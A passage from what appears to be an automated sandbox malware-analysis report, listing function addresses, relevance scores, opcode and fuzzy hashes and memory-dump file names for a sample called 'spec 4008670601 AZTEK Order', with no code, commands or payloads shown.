                                                      • Opcode ID: 7ca2a1f89e60779237cef8f65fce484afb0d0af50646247036bb1da66461457d
                                                      • Instruction ID: 07500e031e40808932d85439b05744fcde0663d231198683d7ebe16ff6ae3d65
                                                      • Opcode Fuzzy Hash: 7ca2a1f89e60779237cef8f65fce484afb0d0af50646247036bb1da66461457d
                                                      • Instruction Fuzzy Hash: F64158B15043159BD721DF29C844B9BFBE8FF88754F004A2EF598C7251E7709A44CB92
                                                      Function 018205A7 Relevance: .1, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 81833808ce75c464a3acc2cf8ab092b7e61c2ba9388e72b41730a75df589556c
                                                      • Instruction ID: 8a86f62033322127460a3b2464c16eb57556d33693fae8b94a9434858e8d4bd6
                                                      • Opcode Fuzzy Hash: 81833808ce75c464a3acc2cf8ab092b7e61c2ba9388e72b41730a75df589556c
                                                      • Instruction Fuzzy Hash: A441C2726087569FD321DF6CC884BAAB7E5BFC8700F140A19F994D7680E730EA44C7A6
                                                      Function 017A4859 Relevance: .1, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4fb71cf6f36b70ec8e63eee9f507ed0d403efd7df260b1449e5ccac9ab5e8ff0
                                                      • Instruction ID: 9c7f0e378d7021d0bae642bb2863b516852f965744eecb2487f0afe81f60d787
                                                      • Opcode Fuzzy Hash: 4fb71cf6f36b70ec8e63eee9f507ed0d403efd7df260b1449e5ccac9ab5e8ff0
                                                      • Instruction Fuzzy Hash: A741D2302003018BD725CF1CD888B2AFBE9EFC0350F58462DE642872A1D7B1D961CB91
                                                      Function 017B02E1 Relevance: .1, Instructions: 106COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                      • Instruction ID: c448f58b39e2de12348e1e8cfdec361ee29cacf7c4255efb0d96131c70263b0a
                                                      • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                      • Instruction Fuzzy Hash: 37310531A05244AFDB128B68CC88BDBFBF9AF54350F0481A9F855D7396D7749984CBA0
                                                      Function 0184E3DB Relevance: .1, Instructions: 105COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e668a794386b75929c8df60cb3d29308f31d6c74dda5a4cfff1e140236ff2c94
                                                      • Instruction ID: aa4487b4f9d61a1f88b4c92cdd64df1614df2fa79e2e9f6601de66a85698d8af
                                                      • Opcode Fuzzy Hash: e668a794386b75929c8df60cb3d29308f31d6c74dda5a4cfff1e140236ff2c94
                                                      • Instruction Fuzzy Hash: 4F31763575071AABD7229FA58CC5FABB7A5BB58B54F000028F600EB295DEA8DD0187A0
                                                      Function 01854B4B Relevance: .1, Instructions: 104COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5b923b1f6fa6587f23fcad3c711b501b54c7c6d66ace46df9d169b6d06aede17
                                                      • Instruction ID: d35867cca0180fc879c6e5f70571bf4368b4487f5802d62cf47da0fe343f4488
                                                      • Opcode Fuzzy Hash: 5b923b1f6fa6587f23fcad3c711b501b54c7c6d66ace46df9d169b6d06aede17
                                                      • Instruction Fuzzy Hash: 9331CF326052018FC321DF19D884E66B7F6FBC0364F1A446EE995DB255E731AE80CF91
                                                      Function 017A4260 Relevance: .1, Instructions: 102COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3fd58a9f93feddb6a14d37a42466f7d99d8fd13cfef9fec254b4ba26f3125968
                                                      • Instruction ID: 6caa5922d69a46558d42ba289feb70425d802bd4f3f393f6ffc6c3dc6c29728f
                                                      • Opcode Fuzzy Hash: 3fd58a9f93feddb6a14d37a42466f7d99d8fd13cfef9fec254b4ba26f3125968
                                                      • Instruction Fuzzy Hash: D841BD71200B09DFD763CF28C884BD6BBE9BF49354F048529E65ACB291C770E900CB90
                                                      Function 01854BB0 Relevance: .1, Instructions: 101COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 89689c8641677630d1257deacc56b2d2b7ab984cba2808f230c5b7759dca425c
                                                      • Instruction ID: 8e2e825104361b65ca398e2407766801862dc6e10039fc1a6c90d653059516b0
                                                      • Opcode Fuzzy Hash: 89689c8641677630d1257deacc56b2d2b7ab984cba2808f230c5b7759dca425c
                                                      • Instruction Fuzzy Hash: 69319C716042019FD360DF28C880A2AB7E5FBC4724F19496DFD65DB295E730EE44CB92
                                                      Function 0181EB1D Relevance: .1, Instructions: 100COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 63ffb35998522aa1724b195a7fbe298b3422edd56f446e7e2eaa1b41c7d5d1d6
                                                      • Instruction ID: 74e592b2d449648153858fb5c0320a2f1e35eaba738c333d4f5eaa5410a710a3
                                                      • Opcode Fuzzy Hash: 63ffb35998522aa1724b195a7fbe298b3422edd56f446e7e2eaa1b41c7d5d1d6
                                                      • Instruction Fuzzy Hash: 1131A0727016869BF3235B5CCD88F65BBDCBB40B44F1D04A0AE46EB6D5DB28DA80C221
                                                      Function 018661C3 Relevance: .1, Instructions: 97COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3ae6a3f440c62ba3d1e1cfc51e481a5a4415540edd67eb668728c2dfe414a4d2
                                                      • Instruction ID: 6966f9c6a5252774bedace0b7ec0b833a1913b80049dfc7d8b38b92eb5d11e11
                                                      • Opcode Fuzzy Hash: 3ae6a3f440c62ba3d1e1cfc51e481a5a4415540edd67eb668728c2dfe414a4d2
                                                      • Instruction Fuzzy Hash: 8B31B275A0015AABDB15DF98C884FAEB7B9FB48B40F554168E901EB344E770AE40CB94
                                                      Function 0184483A Relevance: .1, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: da38070620965b46a0f82883bf6f15be31593af66ab84491bb7748671ced683f
                                                      • Instruction ID: 6eb000f220b5e12cf47be026d9754a8a0bf1143b12d664c268a8739bbcd010d7
                                                      • Opcode Fuzzy Hash: da38070620965b46a0f82883bf6f15be31593af66ab84491bb7748671ced683f
                                                      • Instruction Fuzzy Hash: CF313376A4012DABCF21DF54DC88BDEBBF5AB98350F1401A5A508E7260DA309F919F90
                                                      Function 017CEB20 Relevance: .1, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9fdb0683f9ef4cc6d1429ff5ec618e94de8635aadc844e3e85ad7f3c7638d14f
                                                      • Instruction ID: 619f1656e0b54067e146f82db90366e07e772fbaf2c1ffffe2930eb65bbbab15
                                                      • Opcode Fuzzy Hash: 9fdb0683f9ef4cc6d1429ff5ec618e94de8635aadc844e3e85ad7f3c7638d14f
                                                      • Instruction Fuzzy Hash: 6131B272A01219AFDB32DEA9CC40EAEFBF8EF44750F018469E915D7250D6709E008BA0
                                                      Function 018660B8 Relevance: .1, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bd5da5f8eadab850b5e4be53cb22654cfd06f312f56bafcba632929006e4afdf
                                                      • Instruction ID: 831edc2528853fb5296912b5a8dfe61ce2d0f859ad08a58e1df9e57169d22073
                                                      • Opcode Fuzzy Hash: bd5da5f8eadab850b5e4be53cb22654cfd06f312f56bafcba632929006e4afdf
                                                      • Instruction Fuzzy Hash: A231C871700A46EFDB129FA9C890B6ABBBDAF44754F25406DE505EB342EB30DE018B90
                                                      Function 017A07AF Relevance: .1, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6895a34577b9927be8569be76bb3a245c5478c84f3ef0f08b1c77a9df61f019b
                                                      • Instruction ID: fc4f3ea409adaf23aedd1b0917fb6cbcd956f24a6514af34e1babe2fc0987255
                                                      • Opcode Fuzzy Hash: 6895a34577b9927be8569be76bb3a245c5478c84f3ef0f08b1c77a9df61f019b
                                                      • Instruction Fuzzy Hash: B331F172A44202DBCB12DE288884A6BFBA5AFD4650F414A2DFD5597314DA30DC01CBE5
                                                      Function 017A8550 Relevance: .1, Instructions: 94COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b0714c8d897922f2a24b460f72448b343fed8ec2b2e09fa83627477dda75671a
                                                      • Instruction ID: a411992acea8388e380c3d1b6f72ffb01db86b61e84414c8dc64f8d4047c0500
                                                      • Opcode Fuzzy Hash: b0714c8d897922f2a24b460f72448b343fed8ec2b2e09fa83627477dda75671a
                                                      • Instruction Fuzzy Hash: 8C319E716053018FE761CF19C848B2AFBE6FB88700F544A6DE984DB391D7B0E944CB92
                                                      Function 017DA6C7 Relevance: .1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                      • Instruction ID: 55957e749cd97b6429a4102f4131732484dee991ea324a8b8c4fe1d06bb950ed
                                                      • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                      • Instruction Fuzzy Hash: 52312AB2B00B05AFD761CF69CD40B57BBF8BB08B60F15096DA59AC3651E670E9008B60
                                                      Function 0184EBD0 Relevance: .1, Instructions: 91COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c076737cada405ce2355904bfd1d1c5d756fd96c1044e299879216d18cbe60c4
                                                      • Instruction ID: 23fa8c12a0bc8480d24053063301aa245b611a55ab81abdf8b62d726a921530e
                                                      • Opcode Fuzzy Hash: c076737cada405ce2355904bfd1d1c5d756fd96c1044e299879216d18cbe60c4
                                                      • Instruction Fuzzy Hash: D931C9B15053068FCB10DF19C48095ABBF1FF89314F0849AEE488DB312E735EA44CB96
                                                      Function 017C438F Relevance: .1, Instructions: 89COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0ff1679991c7d656425ae287e806c74da59451a743c947ee46a7ab03e06b9052
                                                      • Instruction ID: 6357d6eb270f2a91d83a620e2d4f250b65cb0b07a9378d98597da3db8004e080
                                                      • Opcode Fuzzy Hash: 0ff1679991c7d656425ae287e806c74da59451a743c947ee46a7ab03e06b9052
                                                      • Instruction Fuzzy Hash: F731E471B002059FD720DFA8CC94A6EFBF9AB94B04F20842DD516D7294D730DA41CB50
                                                      Function 0179CB7E Relevance: .1, Instructions: 89COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                      • Instruction ID: f840d41fb95fe3930e2e805c67dc9b334f9344d8f0241842edf8ec8306402caa
                                                      • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                      • Instruction Fuzzy Hash: 7B210636E4025AAADF11DBB98841BAFFBB5EF15740F0580799F19EB340E270D90487A0
                                                      Function 0179C156 Relevance: .1, Instructions: 88COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 13454f8a376007b4d28473045bf5c91735927f303ef67aa2edc00f0e4d43d921
                                                      • Instruction ID: 47859b19e0f3e1ec4b8b0c28d2d407d4f926fa510156c0b31fac4d625d755b1d
                                                      • Opcode Fuzzy Hash: 13454f8a376007b4d28473045bf5c91735927f303ef67aa2edc00f0e4d43d921
                                                      • Instruction Fuzzy Hash: D3313BB25002018BDB31AF5CCC85BAAFBB4EF51314F5481ADEA459F346EB34D985CBA0
                                                      Function 0185C3CD Relevance: .1, Instructions: 88COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                      • Instruction ID: f17dc9f30ac5f6195093cd64b1693ff7227445f12aacc4205c180b4fd469862b
                                                      • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                      • Instruction Fuzzy Hash: F1212D3660075666CF15AB99C844EBAFFB8EF40714F40841AFE95CB591E734DA40C761
                                                      Function 0179E420 Relevance: .1, Instructions: 88COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a343fd97bde3c866fb79c6f5699296084139490d5097401ccde55732a0bf75ac
                                                      • Instruction ID: 1a9a50f867323c214781afc0847934e7ef8d36f76404b36a961eb5da3c98240f
                                                      • Opcode Fuzzy Hash: a343fd97bde3c866fb79c6f5699296084139490d5097401ccde55732a0bf75ac
                                                      • Instruction Fuzzy Hash: BB31D431A0152CABDF31DB18DC85FEEF7B9AB15740F0101A1F645A72A0DA74AE848F90
                                                      Function 017D4588 Relevance: .1, Instructions: 87COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                      • Instruction ID: dfd08e9f4ae59979ec7868df03b0cdf58cbd20c2858de5497defdde3b054ae27
                                                      • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                      • Instruction Fuzzy Hash: A3216D72A00609EBCB15CF58C984A8AFBB5FF48714F108069EE179B685D671EA058B90
                                                      Function 017D44B0 Relevance: .1, Instructions: 87COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9b5fb45270eb66ee9cbc363da760ad45e27bc11fa5302e793df8acd74147295a
                                                      • Instruction ID: a0e2ccb127f626f976b24aad3cc4268fca4573e05aba4480e924ab77b60dafee
                                                      • Opcode Fuzzy Hash: 9b5fb45270eb66ee9cbc363da760ad45e27bc11fa5302e793df8acd74147295a
                                                      • Instruction Fuzzy Hash: 5821C3726047499BCB21CF18C880B6BB7F4FF88760F504529FD569BA45D730EA008FA2
                                                      Function 0179E388 Relevance: .1, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                      • Instruction ID: fdaba4b0ef3c2a31809c702bbb1134f3321a418fafaad3c3a0d6abfc19f7ab67
                                                      • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                      • Instruction Fuzzy Hash: 97318931600605EFEB21CFA8D884F6AB7F9EF45354F1445A9E652CB290EB30EE45CB50
                                                      Function 0181E609 Relevance: .1, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 004a2478b737d71d914090d391e6c41b728a2a984acb56b740d6b8547539bd05
                                                      • Instruction ID: 0633480eed3b87be57a8ef2646822a9e7b6172851f0a8fb7400e27ee3dac900a
                                                      • Opcode Fuzzy Hash: 004a2478b737d71d914090d391e6c41b728a2a984acb56b740d6b8547539bd05
                                                      • Instruction Fuzzy Hash: E6316B76A00205DFCB19CF18C884DAEB7B9EF84304F554859EC09DB399E731AA40CB90
                                                      Function 017A8D59 Relevance: .1, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                      • Instruction ID: 9812914dc1aa567e762058e0e5ec0c629f9c066732bc0f692d941973b99d47cd
                                                      • Opcode Fuzzy Hash: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                      • Instruction Fuzzy Hash: A5214832601A499BE7279B2CCC8CB65B7B6AF84754F0A05A0ED02C76D2E3B4DE80C251
                                                      Function 018206F1 Relevance: .1, Instructions: 79COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e87bee8b69e933480e1eab99e68de6a00a5de489fe846fe563251e69cda3f6f0
                                                      • Instruction ID: 4bcea0d2e0ba3e1b5dadd6ff4287a8ecb4a35dd63ce594c271a5263dc70a3478
                                                      • Opcode Fuzzy Hash: e87bee8b69e933480e1eab99e68de6a00a5de489fe846fe563251e69cda3f6f0
                                                      • Instruction Fuzzy Hash: F1217C71900229AFCF21DF59C881ABEB7F4FF48740B544069F941EB254D739AE42CBA1
                                                      Function 0182019F Relevance: .1, Instructions: 78COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9bccb90fd115743a2d0cd4c1be52982a8400b2b84b73c089ca59c510ccedabc2
                                                      • Instruction ID: 5984efb8ce823a05a072f01376a4ba4551097698713b0813607efc50080ede6c
                                                      • Opcode Fuzzy Hash: 9bccb90fd115743a2d0cd4c1be52982a8400b2b84b73c089ca59c510ccedabc2
                                                      • Instruction Fuzzy Hash: B2218B71600655AFD716DB68C884F6AB7A8FF48740F14006AF944DB6A1D734EE80CB68
                                                      Function 01820283 Relevance: .1, Instructions: 74COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ac17a7efe734335b2f588e5d16486c2e8178821772f50bf3c01dbb553d973b3f
                                                      • Instruction ID: f27bc3d32595e2d2a28f2afdfe7bd477ab87e2203f4179c5a27d0cc761d63a4c
                                                      • Opcode Fuzzy Hash: ac17a7efe734335b2f588e5d16486c2e8178821772f50bf3c01dbb553d973b3f
                                                      • Instruction Fuzzy Hash: 1721C1725042569FD712DF59C888B9BFBECEF95740F08045AFD80C7251D730CA84C6A2
                                                      Function 017C2835 Relevance: .1, Instructions: 73COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 64b7fd431aa13bef9a2c239d72247e57f36de967e091525d4f1e205a88232335
                                                      • Instruction ID: 6abd9ae981982575b3e2aa8edd59aa3f3dce5ea437b666cecfcc2bbf6956d152
                                                      • Opcode Fuzzy Hash: 64b7fd431aa13bef9a2c239d72247e57f36de967e091525d4f1e205a88232335
                                                      • Instruction Fuzzy Hash: D12107316457859BF327672CCD48B25BBD4AF41F64F1803A8FA20DB6E2D768C9818210
                                                      Function 017DA30B Relevance: .1, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3657cd1bfad9a172248a19f73b8d4b13ccae794f6a488d2f1e0cf6b3f2c8ec38
                                                      • Instruction ID: 552b5d4620c05023ef3f69004a553e63fb0f690bdb8ee32e6edc24b90431ce9a
                                                      • Opcode Fuzzy Hash: 3657cd1bfad9a172248a19f73b8d4b13ccae794f6a488d2f1e0cf6b3f2c8ec38
                                                      • Instruction Fuzzy Hash: 9F21AC352007019FCB25DF29C940B46B7F6BF08704F248468A549CB765E771E942CB94
                                                      Function 0185A49A Relevance: .1, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
